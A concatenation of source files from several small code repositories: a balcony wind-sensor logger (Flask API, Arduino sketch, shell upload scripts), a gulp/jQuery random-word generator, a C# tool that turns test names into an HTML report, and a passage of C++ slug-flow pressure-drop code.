    # split with a str separator; decode to text first.
    data = request.get_data(as_text=True).split("\n")
    if len(data) < 2:
        print("no data received")
        return "no data received\n"
    if data[-1] != "&api-key=dev":
        print("incorrect api key received")
        return "incorrect api key received\n"
    # Update database entry, overwrite if required
    for row in data:
        parts = row.split(",")
        if len(parts) == 2 and validate_date(parts[0]):
            capture_time, value = parts
            print("processing " + capture_time + "," + str(value))
            # Security fix: parameterize instead of concatenating request
            # data straight into the SQL statement.
            mycursor.execute(
                "INSERT INTO wind_sensor_data (capture_time, value) VALUES (%s, %s) "
                "ON DUPLICATE KEY UPDATE value=%s;",
                (capture_time, value, value))
        else:
            print("not processing row " + str(row))
    mydb.commit()
    print("post request received successfully")
    return "post request received successfully\n"
if __name__ == '__main__':
    # Development server only (debug=True); front with a WSGI server in production.
    app.run(host='0.0.0.0', port='5100', debug=True)
<file_sep>int numOfSwitches = 0;
// Last observed reed-switch state; a change means one switch transition.
bool switchRegister = false;
// Start of the current one-minute reporting window (ms since boot).
unsigned long time = millis();
void setup() {
  //start serial connection
  Serial.begin(9600);
  //configure pin 2 as an input and enable the internal pull-up resistor
  pinMode(2, INPUT_PULLUP);
}
// Counts reed-switch transitions and, once per minute, reports the total as
// a single raw byte over serial (the Pi-side logger reads it with ord()).
void loop() {
  //read the pushbutton value into a variable
  int sensorVal = digitalRead(2);
  // Count every edge (LOW->HIGH and HIGH->LOW), i.e. two counts per full
  // switch cycle. NOTE(review): no debounce here - presumably the reed
  // switch is clean enough at the wind speeds of interest; confirm.
  if (switchRegister != sensorVal)
  {
    switchRegister = sensorVal;
    numOfSwitches++;
  }
  // Window elapsed: emit the count and reset.
  // NOTE(review): counts above 255 would wrap in the single-byte write.
  if (millis() - time >= 60000)
  {
    Serial.write(numOfSwitches);
    time = millis();
    numOfSwitches = 0;
  }
}
<file_sep># wind_sensor
My balcony wind-sensor project.
The `arduino` folder contains the sketch that runs on the Arduino.
processing folder contains processing IDE script that can be run on my PC to read arduino output. Unfortunately couldn't get this to work on raspberry pi. Installed oracle java 8 according to https://askubuntu.com/questions/56104/how-can-i-install-sun-oracles-proprietary-java-jdk-6-7-8-or-jre, and installed processing-3.5.3 for linux 32 bit, but I still can't get the .pde script to run either on processing GUI or in headless mode.
so instead I'll use pyserial on raspberry pi to read arduino output. Funnily I didn't pick this initially just because it wasn't working on my main PC, I couldn't detect the right USB port there, but it's working on my arduino.
use raspberry scripts to scp processing output to my google cloud. Find a way to run this on raspberry pi start up
use gcp files to process the received log files, and make the data available on API. Set up auto emailing mechanism
display data either on hourly or daily basis. Pregenerate charts to make things easier. Allow on demand generation.
could prettify output by using some kind of reactjs front end
why don't we just output from arduino once per minute, and then just post directly from python. no need to post the python output log
<file_sep>#!/bin/bash
source ~/.bashrc
source ~/ws/wind_sensor/gcp/wind_sensor/bin/activate
ps -ef | grep flask_api.py | awk '{print $2}' | xargs kill -9
echo Starting flask_api.py
nohup python $HOME/ws/wind_sensor/gcp/flask_api.py >> log.txt 2>&1 &
<file_sep>#!/bin/bash
# Upload every pending wind-speed log to the collector; a log is renamed only
# after the server confirms receipt, so it is never posted twice.
source ~/.bashrc
date
cd /home/pi/ws/wind_sensor/pyserial/logs/ || exit 1
for log in *txt; do
# Robustness fix: with no pending logs the glob stays literal - skip it
# (the old $(ls *txt) form also broke on filenames with spaces).
[ -e "$log" ] || continue
# Robustness fix: -f avoids an error on the first pass when tmp is absent.
rm -f tmp
curl --data-binary "@$log" 172.16.58.3:5100 -d "api-key=dev" > tmp 2>&1
if grep "post request received successfully" tmp; then
echo "post success"
mv "$log" "$log.posted$(date +"%H%M%S")"
rm -f tmp
else
echo "post fail"
fi
done
| 675aa386ebd51970bcd804a506a7c88cab060dd2 | [
"Markdown",
"Python",
"C++",
"Shell"
] | 10 | Shell | tienlongoc/wind_sensor | 624835175e1ff1cf4264a77099adf2674fe5a22d | ccb9479a6d7b29af47108c140f0fe3c9892b089f |
refs/heads/master | <file_sep>var gulp = require('gulp');
var sass = require('gulp-sass');
var autoprefixer = require('gulp-autoprefixer');
gulp.task('express', function () {
var express = require('express');
var app = express();
app.use(require('connect-livereload')());
app.use(express.static(__dirname));
app.listen(3000, 'localhost');
});
var tinylr;
gulp.task('livereload', function () {
tinylr = require('tiny-lr')();
tinylr.listen(35729);
});
function notifyLiveReload(event) {
var fileName = require('path').relative(__dirname, event.path);
tinylr.changed({
body: {
files: [fileName]
}
});
}
gulp.task('sass', function () {
return gulp.src('style.scss')
.pipe(sass().on('error', sass.logError))
.pipe(gulp.dest(__dirname));
});
gulp.task('autoprefix', function () {
return gulp.src('style.css')
.pipe(autoprefixer({
browsers: ['last 2 versions']
}))
.pipe(gulp.dest(__dirname));
});
gulp.task('watch', function () {
gulp.watch('index.html', notifyLiveReload);
gulp.watch('style.css', notifyLiveReload);
gulp.watch('style.css', ['autoprefix']);
gulp.watch('app.js', notifyLiveReload);
gulp.watch('style.scss', ['sass']);
});
gulp.task('default', ['express', 'livereload', 'watch'], function () {
});
<file_sep>(function ($) {
// Generate one pseudo-word followed by a single trailing space.
//   voyProb:  probability that each character drawn is a vowel.
//   wordProb: probability, checked after each character, that the word ends.
// Always returns at least one letter plus the space.
function geneWord (voyProb, wordProb) {
    var word = false;
    var text = '';
    // Bug fix: alphab1/alphab2 were assigned without `var`, creating implicit
    // globals that leak out of the IIFE and throw under strict mode.
    var alphab1 = 'aeiouy';
    var alphab2 = 'zrtpqsdfghjklmwxcvbn';
    while (!word) {
        if (Math.random() < voyProb) {
            text += alphab1.charAt(Math.floor(Math.random() * alphab1.length));
        } else {
            text += alphab2.charAt(Math.floor(Math.random() * alphab2.length));
        }
        if (Math.random() < wordProb) {
            word = true;
        }
    }
    text += ' ';
    return text;
}
// Append 400 generated pseudo-words to the output paragraph.
function geneText () {
    var appended = 0;
    while (appended < 400) {
        $('.text p').append(geneWord(voyProb, wordProb));
        appended += 1;
    }
}
// Tuning knobs: ~60% of characters are vowels; after each character the word
// ends with probability 0.38 (average word length ~2.6 letters).
var voyProb = 0.60;
var wordProb = 0.38;
// Fill the output paragraph on demand.
$('#startBtn').on('click', function () {
    geneText();
});
// Clear the output paragraph.
$('#clearBtn').on('click', function () {
    $('.text p').html('');
});
})(jQuery);
| a37249ba8331d1f8d6dfe53a054974862775170f | [
"JavaScript"
] | 2 | JavaScript | Zyyol/GulpBaseProject | 8323605c0a0167bf1221506b018d1084b92a5aca | b711dde197820a53eaa211d1a54562005aa6a121 |
refs/heads/main | <repo_name>mokhan/spec.dox<file_sep>/trunk/product/Spec.Dox/Presentation/Views/IReportPublisher.cs
using System.IO;
namespace Spec.Dox.Presentation.Views
{
/// <summary>Writes a generated HTML report to disk.</summary>
public interface IReportPublisher
{
    /// <param name="expected_html">Complete HTML document to write.</param>
    /// <param name="test_assembly_path">Path of the inspected test assembly;
    /// the report is written next to it.</param>
    void Publish(string expected_html, string test_assembly_path);
}
/// <summary>
/// Publishes the report as "report.html" in the directory that contains the
/// inspected test assembly, then echoes the destination to the console.
/// </summary>
public class ReportPublisher : IReportPublisher
{
    public void Publish(string html_to_publish, string test_assembly_path)
    {
        var assemblyDirectory = new FileInfo(test_assembly_path).DirectoryName;
        var reportPath = Path.Combine(assemblyDirectory, "report.html");
        File.WriteAllText(reportPath, html_to_publish);
        System.Console.Out.WriteLine("Report published to... {0}", reportPath);
    }
}
}<file_sep>/README.md
spec.dox
========
A library for generating HTML documentation from your C# test suites.
<file_sep>/trunk/product/Spec.Dox/Domain/MethodDecoratedBySpecificationAttributeSpecs.cs
using System.Reflection;
using MbUnit.Framework;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
using Spec.Dox.Utility.Core;
namespace Spec.Dox.Domain
{
// Marker class grouping the specs for MethodIsDecoratedBySpecificationAttribute.
public class MethodDecoratedBySpecificationAttributeSpecs {}

// The specification should report true when the inspected method carries an
// attribute whose type name matches the configured one ("TestAttribute" here
// matches the [Test] attribute on should_return_true itself).
[Concern(typeof (MethodIsDecoratedBySpecificationAttribute))]
public class when_checking_if_a_method_is_decorated_with_an_attribute_that_it_is_decorated_with :
    context_spec<ISpecification<MethodInfo>>
{
    bool result;
    MethodInfo methodToInspect;

    protected override ISpecification<MethodInfo> EstablishContext()
    {
        methodToInspect = GetType().GetMethod("should_return_true");
        return new MethodIsDecoratedBySpecificationAttribute("TestAttribute");
    }

    protected override void Because()
    {
        result = sut.IsSatisfiedBy(methodToInspect);
    }

    [Test]
    public void should_return_true()
    {
        result.should_be_equal_to(true);
    }
}

// The specification should report false when the method does not carry the
// attribute being looked up (should_return_false has no [Serializable]).
[Concern(typeof (MethodIsDecoratedBySpecificationAttribute))]
public class when_checking_if_a_method_is_decorated_with_an_attribute_that_it_is_not :
    context_spec<ISpecification<MethodInfo>>
{
    bool result;
    MethodInfo methodToInspect;

    protected override ISpecification<MethodInfo> EstablishContext()
    {
        methodToInspect = GetType().GetMethod("should_return_false");
        return new MethodIsDecoratedBySpecificationAttribute("SerializableAttribute");
    }

    protected override void Because()
    {
        result = sut.IsSatisfiedBy(methodToInspect);
    }

    [Test]
    public void should_return_false()
    {
        result.should_be_equal_to(false);
    }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/Repositories/ITestContextRepository.cs
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
namespace Spec.Dox.Domain.Repositories
{
/// <summary>Finds all test contexts (spec fixtures) in a compiled assembly.</summary>
public interface ITestContextRepository
{
    /// <param name="path_to_assembly">File path of the assembly to inspect.</param>
    IEnumerable<ITestContext> All(string path_to_assembly);
}

public class TestContextRepository : ITestContextRepository
{
    // readonly added: the criteria is fixed at construction, matching the
    // field conventions used by the other collaborators in this code base.
    readonly ITypeContainsSpecifications criteria;

    public TestContextRepository() : this(new TypeContainsSpecifications()) {}

    public TestContextRepository(ITypeContainsSpecifications criteria)
    {
        this.criteria = criteria;
    }

    /// <summary>
    /// Loads the assembly and wraps every type that contains at least one
    /// specification method in a TestContext.
    /// </summary>
    public IEnumerable<ITestContext> All(string path_to_assembly)
    {
        return Assembly
            .LoadFrom(path_to_assembly)
            .GetTypes()
            .Where(type => criteria.IsSatisfiedBy(type))
            .Select(type => new TestContext(type))
            .Cast<ITestContext>()
            ;
    }
}
}<file_sep>/trunk/product/Spec.Dox/Test/context_spec.cs
using MbUnit.Framework;
using Rhino.Mocks;
namespace Spec.Dox.Test
{
// Base fixture for BDD-style specs without an explicit system under test.
// Subclasses arrange state in UnderTheseConditions and act in BecauseOf;
// MbUnit runs both before every [Test] via SetUp.
[TestFixture]
public abstract class context_spec
{
    [SetUp]
    public void SetUp()
    {
        UnderTheseConditions();
        BecauseOf();
    }

    [TearDown]
    public virtual void Cleanup() {}

    protected abstract void UnderTheseConditions();
    protected abstract void BecauseOf();

    // Rhino.Mocks helpers: Mock records verifiable expectations, Stub only
    // returns canned values.
    protected TypeToMock Mock<TypeToMock>() where TypeToMock : class
    {
        return MockRepository.GenerateMock<TypeToMock>();
    }

    protected TypeToMock Stub<TypeToMock>() where TypeToMock : class
    {
        return MockRepository.GenerateStub<TypeToMock>();
    }
}

// Variant that also creates and exposes the system under test (sut):
// EstablishContext builds it, Because exercises it; both run before each test.
[TestFixture]
public abstract class context_spec<SystemUnderTest>
{
    [SetUp]
    public void SetUp()
    {
        sut = EstablishContext();
        Because();
    }

    [TearDown]
    public virtual void Cleanup() {}

    protected abstract SystemUnderTest EstablishContext();
    protected abstract void Because();

    // Named Dependency here (vs Mock above) but still a verifiable mock.
    protected TypeToMock Dependency<TypeToMock>() where TypeToMock : class
    {
        return MockRepository.GenerateMock<TypeToMock>();
    }

    protected TypeToMock Stub<TypeToMock>() where TypeToMock : class
    {
        return MockRepository.GenerateStub<TypeToMock>();
    }

    protected SystemUnderTest sut { get; private set; }
}
}<file_sep>/trunk/product/Spec.Dox/ConsoleSpecs.cs
using MbUnit.Framework;
using Spec.Dox.Presentation.Presenters;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
namespace Spec.Dox
{
public class ConsoleSpecs
{
    // Executing the console with arguments should simply pass them through to
    // the report presenter.
    [Concern(typeof (Console))]
    public class when_the_console_is_given_valid_console_arguments : context_spec<IConsole>
    {
        string[] command_line_arguments;
        IReportPresenter presenter;

        protected override IConsole EstablishContext()
        {
            command_line_arguments = new[] {"path", "testfixtureattributename"};
            presenter = Dependency<IReportPresenter>();
            return new Console(presenter);
        }

        protected override void Because()
        {
            sut.Execute(command_line_arguments);
        }

        [Test]
        public void should_initialize_the_report_presenter()
        {
            presenter.received(p => p.Initialize(command_line_arguments));
        }
    }
}
}<file_sep>/trunk/product/Spec.Dox/Utility/Core/ISpecification.cs
namespace Spec.Dox.Utility.Core
{
/// <summary>
/// Specification pattern: encapsulates a boolean predicate over
/// <typeparamref name="TypeToInspect"/>.
/// </summary>
public interface ISpecification<TypeToInspect>
{
    bool IsSatisfiedBy(TypeToInspect item);
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Presenters/ReportPresenterSpecs.cs
using System.Collections.Generic;
using MbUnit.Framework;
using Spec.Dox.Domain;
using Spec.Dox.Domain.Repositories;
using Spec.Dox.Presentation.Views;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
namespace Spec.Dox.Presentation.Presenters
{
// Marker interface grouping the ReportPresenter specs.
public interface ReportPresenterSpecs {}

// Initializing the presenter should pull every context from the repository,
// push each context plus its specifications into the report view, and publish
// the report next to the inspected assembly (first command-line argument).
[Concern(typeof (ReportPresenter))]
public class when_initializing_the_report_presenter : context_spec<IReportPresenter>
{
    ITestContextRepository repository;
    ITestContext context;
    IHtmlReport view;
    IList<ITestSpecification> specifications;
    string[] args = new[] {"1", "2"};

    protected override IReportPresenter EstablishContext()
    {
        repository = Dependency<ITestContextRepository>();
        view = Dependency<IHtmlReport>();
        context = Stub<ITestContext>();
        specifications = new List<ITestSpecification>();
        // Repository returns one stubbed context for assembly path "1".
        repository
            .is_told_to(r => r.All("1"))
            .Return(new List<ITestContext> {context});
        context
            .is_told_to(c => c.AllSpecifications())
            .Return(specifications);
        return new ReportPresenter(view, repository);
    }

    protected override void Because()
    {
        sut.Initialize(args);
    }

    [Test]
    public void should_retrieve_each_of_the_specification_that_belong_to_the_context()
    {
        context.received(c => c.AllSpecifications());
    }

    [Test]
    public void should_display_the_specification_for_each_context()
    {
        view.received(v => v.Add(context, specifications));
    }

    [Test]
    public void should_generate_the_report()
    {
        view.received(v => v.publish_to_same_folder_as("1"));
    }
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Views/IHtmlReport.cs
using System.Collections.Generic;
using System.Text;
using Spec.Dox.Domain;
namespace Spec.Dox.Presentation.Views
{
/// <summary>Accumulates contexts and specifications, renders them as HTML.</summary>
public interface IHtmlReport
{
    void Add(ITestContext context, IEnumerable<ITestSpecification> specifications);
    void publish_to_same_folder_as(string test_assembly_path);
}

public class HtmlReport : IHtmlReport
{
    readonly IReportPublisher publisher;
    readonly StringBuilder builder;

    public HtmlReport() : this(new ReportPublisher()) {}

    public HtmlReport(IReportPublisher publisher)
    {
        this.publisher = publisher;
        builder = new StringBuilder();
        // The document is opened here and closed in publish_to_same_folder_as,
        // so an instance is effectively single-use: publishing twice would
        // append the closing tags twice.
        builder.Append("<html><head><title>Specifications Document</title></head><body>");
    }

    // Renders the context name as a heading and its specifications as a list;
    // underscores in spec-style names become spaces for readability.
    public void Add(ITestContext context, IEnumerable<ITestSpecification> specifications)
    {
        builder.AppendFormat("<h1>{0}</h1>", context.Name.Replace("_", " "));
        builder.Append("<ul>");
        foreach (var specification in specifications)
        {
            builder.AppendFormat("<li>{0}</li>", specification.Name.Replace("_", " "));
        }
        builder.Append("</ul>");
    }

    public void publish_to_same_folder_as(string test_assembly_path)
    {
        builder.Append("</body></html>");
        publisher.Publish(builder.ToString(), test_assembly_path);
    }
}
}<file_sep>/trunk/product/Spec.Dox/Test/MetaData/ConcernAttribute.cs
using System;
namespace Spec.Dox.Test.MetaData
{
/// <summary>
/// Marks a spec class with the type it exercises (its "concern").
/// </summary>
[AttributeUsage(AttributeTargets.Class)]
public class ConcernAttribute : Attribute
{
    public ConcernAttribute(Type systemUnderTest)
    {
        SystemUnderTest = systemUnderTest;
    }

    // The type this spec class is concerned with.
    public Type SystemUnderTest { get; private set; }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/IMethodIsDecoratedBySpecificationAttribute.cs
using System;
using System.Reflection;
using Spec.Dox.Utility.Core;
namespace Spec.Dox.Domain
{
public interface IMethodIsDecoratedBySpecificationAttribute : ISpecification<MethodInfo> {}

/// <summary>
/// Satisfied when a method carries at least one attribute whose type name
/// equals the configured attribute name.  The default constructor takes that
/// name from the third command-line argument.
/// </summary>
public class MethodIsDecoratedBySpecificationAttribute : IMethodIsDecoratedBySpecificationAttribute
{
    readonly string name_of_the_attribute_to_lookup;

    public MethodIsDecoratedBySpecificationAttribute() : this(Environment.GetCommandLineArgs()[2]) {}

    public MethodIsDecoratedBySpecificationAttribute(string nameOfAttributeToLookup)
    {
        name_of_the_attribute_to_lookup = nameOfAttributeToLookup;
    }

    public bool IsSatisfiedBy(MethodInfo item)
    {
        var attributes = item.GetCustomAttributes(true);
        for (var index = 0; index < attributes.Length; index++)
        {
            var attributeTypeName = attributes[index].GetType().Name;
            if (attributeTypeName.Equals(name_of_the_attribute_to_lookup))
            {
                return true;
            }
        }
        return false;
    }
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Views/HtmlReportSpecs.cs
using System.Collections.Generic;
using MbUnit.Framework;
using Rhino.Mocks;
using Spec.Dox.Domain;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
namespace Spec.Dox.Presentation.Views
{
public class HtmlReportSpecs {}

// Publishing a report that holds one context with one specification should
// hand the publisher a complete HTML document whose names have underscores
// replaced by spaces.
[Concern(typeof (HtmlReport))]
public class when_publishing_an_html_report_with_specification_added_to_it : context_spec<IHtmlReport>
{
    IReportPublisher publisher;

    protected override IHtmlReport EstablishContext()
    {
        publisher = Dependency<IReportPublisher>();
        var fixture = Stub<ITestContext>();
        var testSpecification = Stub<ITestSpecification>();
        fixture.is_told_to(f => f.Name).Return("when_a_blah_blah");
        testSpecification.is_told_to(t => t.Name).Return("should_do_some_stuff");
        var context = new HtmlReport(publisher);
        context.Add(fixture, new List<ITestSpecification> {testSpecification});
        return context;
    }

    protected override void Because()
    {
        sut.publish_to_same_folder_as("path");
    }

    [Test]
    public void should_publish_the_correct_html()
    {
        var expected_html =
            "<html><head><title>Specifications Document</title></head><body><h1>when a blah blah</h1><ul><li>should do some stuff</li></ul></body></html>";
        publisher.received(p => p.Publish(Arg<string>.Is.Equal(expected_html), "path"));
    }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/ITypeContainsSpecifications.cs
using System;
using Spec.Dox.Utility.Core;
namespace Spec.Dox.Domain
{
public interface ITypeContainsSpecifications : ISpecification<Type> {}

/// <summary>
/// Satisfied when a type has at least one public method decorated with the
/// configured specification attribute.
/// </summary>
public class TypeContainsSpecifications : ITypeContainsSpecifications
{
    // readonly added: fixed at construction, consistent with the readonly
    // fields used elsewhere in this code base.
    readonly IMethodIsDecoratedBySpecificationAttribute criteria;

    public TypeContainsSpecifications() : this(new MethodIsDecoratedBySpecificationAttribute()) {}

    public TypeContainsSpecifications(IMethodIsDecoratedBySpecificationAttribute criteria)
    {
        this.criteria = criteria;
    }

    public bool IsSatisfiedBy(Type item)
    {
        foreach (var method in item.GetMethods())
        {
            if (criteria.IsSatisfiedBy(method))
                return true;
        }
        return false;
    }
}
}<file_sep>/trunk/product/Spec.Dox/Test/Extensions/AssertionExtensions.cs
using MbUnit.Framework;
namespace Spec.Dox.Test.Extensions
{
/// <summary>Fluent assertion helpers used by the specs.</summary>
static public class AssertionExtensions
{
    // Reads as: actual.should_be_equal_to(expected); delegates to MbUnit.
    static public void should_be_equal_to<T>(this T itemToCheck, T itemToBeEqualTo)
    {
        Assert.AreEqual(itemToBeEqualTo, itemToCheck);
    }
}
}<file_sep>/trunk/product/Spec.Dox/IConsole.cs
using System.Collections.Generic;
using Spec.Dox.Presentation.Presenters;
namespace Spec.Dox
{
/// <summary>Application facade invoked by Program.Main.</summary>
public interface IConsole
{
    void Execute(IEnumerable<string> command_line_arguments);
}

public class Console : IConsole
{
    readonly IReportPresenter presenter;

    public Console() : this(new ReportPresenter()) {}

    public Console(IReportPresenter presenter)
    {
        this.presenter = presenter;
    }

    // Thin wrapper: all work is delegated to the report presenter.
    public void Execute(IEnumerable<string> command_line_arguments)
    {
        presenter.Initialize(command_line_arguments);
    }
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Presenters/IReportPresenter.cs
using System.Collections.Generic;
using System.Linq;
using Spec.Dox.Domain.Repositories;
using Spec.Dox.Presentation.Views;
namespace Spec.Dox.Presentation.Presenters
{
/// <summary>Drives generation of the specification report.</summary>
public interface IReportPresenter
{
    /// <param name="command_line_arguments">First element: path of the test
    /// assembly to document.</param>
    void Initialize(IEnumerable<string> command_line_arguments);
}

public class ReportPresenter : IReportPresenter
{
    readonly IHtmlReport report;
    readonly ITestContextRepository repository;

    public ReportPresenter() : this(new HtmlReport(), new TestContextRepository()) {}

    public ReportPresenter(IHtmlReport report, ITestContextRepository repository)
    {
        this.report = report;
        this.repository = repository;
    }

    /// <summary>
    /// Adds every context found in the assembly (with its specifications) to
    /// the report, then publishes the report next to the assembly.
    /// </summary>
    public void Initialize(IEnumerable<string> command_line_arguments)
    {
        // Hoisted: ElementAt(0) was evaluated twice, enumerating the argument
        // sequence once per use.
        var test_assembly_path = command_line_arguments.ElementAt(0);
        foreach (var context in repository.All(test_assembly_path))
            report.Add(context, context.AllSpecifications());
        report.publish_to_same_folder_as(test_assembly_path);
    }
}
}<file_sep>/trunk/product/Spec.Dox/Utility/Core/IFactory.cs
namespace Spec.Dox.Utility.Core
{
/// <summary>Generic factory: creates instances of TypeToCreate.</summary>
public interface IFactory<TypeToCreate>
{
    TypeToCreate Create();
}
}<file_sep>/trunk/product/Spec.Dox/Test/Extensions/MockingExtensions.cs
using System;
using Rhino.Mocks;
using Rhino.Mocks.Interfaces;
namespace Spec.Dox.Test.Extensions
{
/// <summary>Readable wrappers around Rhino.Mocks verification and stubbing.</summary>
static public class MockingExtensions
{
    // Verifies an interaction happened: mock.received(m => m.DoWork()).
    static public void received<T>(this T typeToVerify, Action<T> actionToPerform)
    {
        typeToVerify.AssertWasCalled(actionToPerform);
    }

    // Arranges a canned result: stub.is_told_to(s => s.Value).Return(42).
    static public IMethodOptions<R> is_told_to<T, R>(this T typeToVerify, Function<T, R> actionToPerform) where T : class
    {
        return typeToVerify.Stub(actionToPerform);
    }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/ITestSpecification.cs
using System.Reflection;
namespace Spec.Dox.Domain
{
/// <summary>A single specification (one decorated test method).</summary>
public interface ITestSpecification
{
    string Name { get; }
}

public class TestSpecification : ITestSpecification
{
    // Captures only the method name; the MethodInfo itself is not retained.
    public TestSpecification(MethodInfo method)
    {
        Name = method.Name;
    }

    public string Name { get; private set; }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/ITestContext.cs
using System;
using System.Collections.Generic;
namespace Spec.Dox.Domain
{
/// <summary>A spec fixture: a type that groups related specifications.</summary>
public interface ITestContext
{
    string Name { get; }
    IEnumerable<ITestSpecification> AllSpecifications();
}

public class TestContext : ITestContext
{
    readonly Type type;
    // readonly added: fixed at construction, consistent with the `type`
    // field above.
    readonly IMethodIsDecoratedBySpecificationAttribute methodCriteria;

    public TestContext(Type type) : this(type, new MethodIsDecoratedBySpecificationAttribute()) {}

    public TestContext(Type type, IMethodIsDecoratedBySpecificationAttribute methodCriteria)
    {
        this.type = type;
        this.methodCriteria = methodCriteria;
        Name = type.Name;
    }

    public string Name { get; private set; }

    /// <summary>Lazily yields one TestSpecification per decorated method.</summary>
    public IEnumerable<ITestSpecification> AllSpecifications()
    {
        foreach (var method in type.GetMethods())
        {
            if (methodCriteria.IsSatisfiedBy(method))
                yield return new TestSpecification(method);
        }
    }
}
}<file_sep>/trunk/product/Spec.Dox/Program.cs
using System;
using System.Collections.Generic;
using System.Reflection;
namespace Spec.Dox
{
/// <summary>
/// Console entry point: echoes the received arguments, then generates the
/// specification report for the given test assembly.
/// Usage: spec.dox.exe [full path to assembly] [attribute name on each test]
/// </summary>
public class Program
{
    static void Main(string[] args)
    {
        try
        {
            display(args);
            new Console().Execute(args);
        }
        catch (ReflectionTypeLoadException e)
        {
            // Type-load failures carry the useful detail in LoaderExceptions.
            System.Console.Out.WriteLine(e);
            foreach (var error in e.LoaderExceptions)
            {
                System.Console.Out.WriteLine(error);
            }
        }
        catch (Exception e)
        {
            // Anything else: show the error plus usage help.
            System.Console.Out.WriteLine(e);
            System.Console.Out.WriteLine("spec.dox.exe [full path to assembly to inspect] [full name of attribute decorating each test]");
            System.Console.Out.WriteLine("e.g...");
            System.Console.Out.WriteLine("spec.dox.exe c:/development/test.dll TestAttribute");
        }
    }

    // Echo the raw command-line arguments.  (Renamed from the typo "dispay";
    // the method is private and its only call site is updated above.)
    static void display(IEnumerable<string> args)
    {
        System.Console.Out.WriteLine("Received:");
        foreach (var arg in args) System.Console.Out.WriteLine(arg);
        System.Console.Out.WriteLine();
    }
}
} | db019055a438b6306dc150fda6f53c635b04b243 | [
"Markdown",
"C#"
] | 21 | C# | mokhan/spec.dox | 4ba6094e00f2334eacf94e2bd6ea904cd3725668 | 461ac5e059f1a4d133ac239f6abbacd65d581477 |
refs/heads/master | <file_sep>#define _USE_MATH_DEFINES
#include <iostream>
#include <cmath>
#include <vector>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include "StratifiedFlowGeometry.h"
#include "dPCalculation.h"
namespace MultiphaseTemperature {
/*
 * Computes the frictional pressure loss of one slug unit from the
 * hydrodynamic film profile.
 *   Inputs:      operating conditions (VSL, VSG, ID, T, P, roughness, IT).
 *   HydroInputs: numerical settings for the film-profile integration
 *                (initial film length, dx, tolerances, hMax).
 * The result is accumulated into the dP member, converted from Pa to psi.
 */
PressureCal::PressureCal(std::vector<double>& Inputs, std::vector<double>& HydroInputs)
{
    // Unpack the operating conditions.
    VSL = Inputs[0];
    VSG = Inputs[1];
    ID = Inputs[2];
    T = Inputs[3];
    P = Inputs[4];
    PipeRoughness = Inputs[5];
    IT = Inputs[6];//InterfactialTension
    // Numerical settings for the film-profile solver.
    LfInitial = HydroInputs[0];
    dx = HydroInputs[1];
    Epsilon = HydroInputs[2];
    hMax = HydroInputs[3];
    EpsilonZh = HydroInputs[4];
    zArray.clear();
    HLTBArray.clear();
    user::PipeGeometry PipeProps;
    user::FluidProperties Fluid(T, P);
    FilmProfile Film(Inputs);
    //Fluid properties at (T, P)
    RhoG = Fluid.Gas.Rho(Fluid);
    RhoL = Fluid.Liquid.Rho(Fluid);
    MuL = Fluid.Liquid.Mu(Fluid);
    MuG = Fluid.Gas.Mu(Fluid);
    //Now let's compute the hydrodynamic properties of the film
    Film.HyrodynamicProperties(LfInitial, dx, Epsilon, hMax, EpsilonZh);
    //Slug section properties
    HLLS=Film.HLLS;
    ZSize = Film.ZSize;
    // Slug-body mixture properties are holdup-weighted averages.
    RhoS = RhoL * HLLS + RhoG * (1 - HLLS);
    MuS = MuL * HLLS + MuG * (1 - HLLS);
    Lf = Film.LfFinal;
    Ls= Film.Ls;
    Vm = Film.Vm;
    HLTBAvg= Film.HLTBAvg;
    VTb = Film.VTb;
    VLLS = Film.VLLS;
    VGLS = Film.VGLS;
    //Copy the axial HLTB profile computed by the RKF45 integration
    for (int i = 0; i < ZSize + 1; i++)
    {
        zArray.push_back(Film.XSave[i]);
        HLTBArray.push_back(Film.HLTBSave[i]);
    }
    // Slug-body frictional pressure drop over the slug length Ls.
    fS = Film.FannningFrictionFactor(RhoS, Vm, ID, MuS, PipeRoughness);
    ShearS = fS * RhoS*Vm*Vm / 2.0;
    PressSlug = (ShearS * M_PI*ID / (M_PI*0.25*ID*ID))*Ls;
    double z;
    double HLTB;
    PressFilm = 0;
    PressGas = 0;
    PressSFilm = 0;
    PressSGas = 0;
    // March along the film region, accumulating the wall-shear losses of the
    // liquid film and the gas pocket over each segment (midpoint HLTB).
    for (int i = 1; i < ZSize + 1; i++) //Check this for 2
    {
        z= (zArray[i] - zArray[i-1]);
        HLTB=(HLTBArray[i] + HLTBArray[i-1])/2.0;
        StratifiedFlowGeometry Geometry(HLTB,ID);
        // The geometry object returns dimensionless areas/perimeters; scale
        // by ID (areas by ID^2, perimeters by ID).
        AF = Geometry.ALTilt*ID*ID;
        AG = Geometry.AGTilt*ID*ID;
        SG = Geometry.SGTilt*ID;
        SF = Geometry.SLTilt*ID;
        SI = Geometry.SITilt*ID;
        // Phase velocities from a mass balance relative to the slug front.
        VF = (VTb - VLLS)*HLLS / HLTB;
        VG = (VTb - VGLS)*(1 - HLLS) / (1 - HLTB);
        VLTB= VTb - VF;
        VGTB= VTb - VG;
        // Friction factors use the hydraulic diameters 4A/S of each phase.
        fF = Film.FannningFrictionFactor(RhoL, abs(VLTB),
            4 * AF / SF, MuL, PipeRoughness);
        fG = Film.FannningFrictionFactor(RhoG, abs(VGTB),
            4 * AG / (SI + SG), MuG, PipeRoughness);
        ShearF = fF * RhoL*abs(VLTB)*VLTB / 2.0;
        ShearG = fG * RhoG*abs(VGTB)*VGTB / 2.0;
        PressFilm = PressFilm+ShearF * SF*z / (M_PI*0.25*ID*ID);
        PressGas = PressGas+ShearG * SG*z / (M_PI*0.25*ID*ID);
